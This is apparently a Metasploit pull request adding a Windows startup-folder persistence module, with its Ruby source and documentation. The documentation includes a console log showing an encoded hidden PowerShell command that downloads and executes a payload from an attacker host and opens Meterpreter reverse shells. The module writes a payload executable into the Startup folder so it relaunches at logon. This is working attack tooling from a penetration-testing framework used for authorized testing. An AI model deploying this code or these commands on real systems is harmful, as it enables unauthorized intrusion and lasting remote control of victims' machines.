### PR TITLE
windows persistence: startup folder

### DIFF
--- a/documentation/modules/exploit/windows/persistence/startup_folder.md
+++ b/documentation/modules/exploit/windows/persistence/startup_folder.md
@@ -1,0 +1,120 @@
+## Vulnerable Application
+
+This module establishes persistence by creating a payload in the user or system startup folder.
+Works on Vista and newer systems.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. get session on target with admin/system privs
+2. `use exploit/windows/persistence/startup_folder`
+3. `set payload <payload>`
+4. `set lport <lport>`
+5. `set lhost <lhost>`
+6. `exploit`
+
+## Options
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### CONTEXT
+
+Target current User or All Users (system). Defaults to `USER`. Choices are
+`USER` which installs just to that user's startup folder. `SYSTEM` installs
+to the system default startup folder which effects all users.
+
+## Scenarios
+
+### Windows 10 1909 (10.0 Build 18363)
+
+Initial Payload
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 2
+target => 2
+resource (/root/.msf4/msfconsole.rc)> set srvport 8085
+srvport => 8085
+resource (/root/.msf4/msfconsole.rc)> set uripath w2
+uripath => w2
+resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4449
+lport => 4449
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4449 
+[*] Using URL: http://1.1.1.1:8085/w2
+[*] Server started.
+[*] Run the following command on the target machine:
+powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABzAFIANAA0AEsAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAcwBSADQANABLAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAcwBSADQANABLAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwAyADAAdAB3AGYAZQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2     web_delivery - Powershell command length: 3682
+[*] 2.2.2.2     web_delivery - Delivering Payload (3682 bytes)
+[*] Sending stage (230982 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:50883) at 2025-10-27 15:10:44 -0400
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 1909 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/startup_folder 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/startup_folder) > set session 1
+session => 1
+msf exploit(windows/persistence/startup_folder) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/startup_folder) > recheck
+[*] Reloading module...
+[*] The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
+msf exploit(windows/persistence/startup_folder) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/startup_folder) > 
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
+[+] Writing payload to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zugyndszf.exe
+[*] Payload (7168 bytes) uploaded on WIN10PROLICENSE to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zugyndszf.exe
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251027.1534/WIN10PROLICENSE_20251027.1534.rc
+```
+
+Logout and back in as user 'windows'
+
+```
+msf exploit(windows/persistence/startup_folder) > [*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50916) at 2025-10-27 15:16:21 -0400
+msf exploit(windows/persistence/startup_folder) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+```

--- a/modules/exploits/windows/persistence/startup_folder.rb
+++ b/modules/exploits/windows/persistence/startup_folder.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Local
     payload_exe = generate_payload_exe
     payload_pathname = folder + '\\' + payload_name + '.exe'
     vprint_good("Writing payload to #{payload_pathname}")
-    write_file(payload_pathname, payload_exe)
+    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
     vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_pathname}")
     @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
   end

--- a/modules/exploits/windows/persistence/startup_folder.rb
+++ b/modules/exploits/windows/persistence/startup_folder.rb
@@ -1,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Persistent Startup Folder',
+        'Description' => %q{
+          This module establishes persistence by creating a payload in the user or system startup folder.
+          Works on Vista and newer systems.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'h00die' ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
+          ['URL', 'https://support.microsoft.com/en-us/windows/configure-startup-applications-in-windows-115a420a-0bff-4a6f-90e0-1934c844e473']
+        ],
+        'DisclosureDate' => '1995-01-01', # windows 95
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
+        OptEnum.new('CONTEXT', [false, 'Target current User or All Users (system)', 'USER', ['USER', 'SYSTEM'] ])
+      ]
+    )
+  end
+
+  def folder
+    if datastore['CONTEXT'] == 'USER'
+      f = session.sys.config.getenv('%userprofile%')
+      f = "#{f}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
+      return f
+    end
+    f = session.sys.config.getenv('%ProgramData%')
+    "#{f}\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
+  end
+
+  def check
+    f = folder
+    begin
+      # windows only ps payloads have writable? so try that first
+      return CheckCode::Safe("Unable to write to #{f}") unless writable?(f)
+    rescue RuntimeError
+      filename = f + '\\' + Rex::Text.rand_text_alpha((rand(6..13)))
+      write_file(filename, '')
+      if exists? filename
+        rm_f(filename)
+        return CheckCode::Appears("Likely exploitable, able to write test file to #{f}")
+      else
+        return CheckCode::Safe("Unable to write to #{f}")
+      end
+    end
+
+    CheckCode::Appears('Likely exploitable')
+  end
+
+  def install_persistence
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+    payload_exe = generate_payload_exe
+    payload_pathname = folder + '\\' + payload_name + '.exe'
+    vprint_good("Writing payload to #{payload_pathname}")
+    write_file(payload_pathname, payload_exe)
+    vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_pathname}")
+    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
+  end
+end


### PR DESCRIPTION
Creates a windows startup folder persistence. Part of #20374

I can't find a persistence module for this, so I'm guessing its a new one! However, holy gosh is this a glaring hole for missing a persistence since its like the original most basic one ever.


## Verification

- [ ] Start `msfconsole`
- [ ] exploit the box somehow 
- [ ] `use exploit/windows/persistence/startup_folder`
- [ ] `set SESSION <id>`
- [ ] `exploit`
- [ ] **Verify** persistence is created, and you get a new session after logout/login
- [ ] **Verify** cleanup works
- [ ] **Document** is updated and correct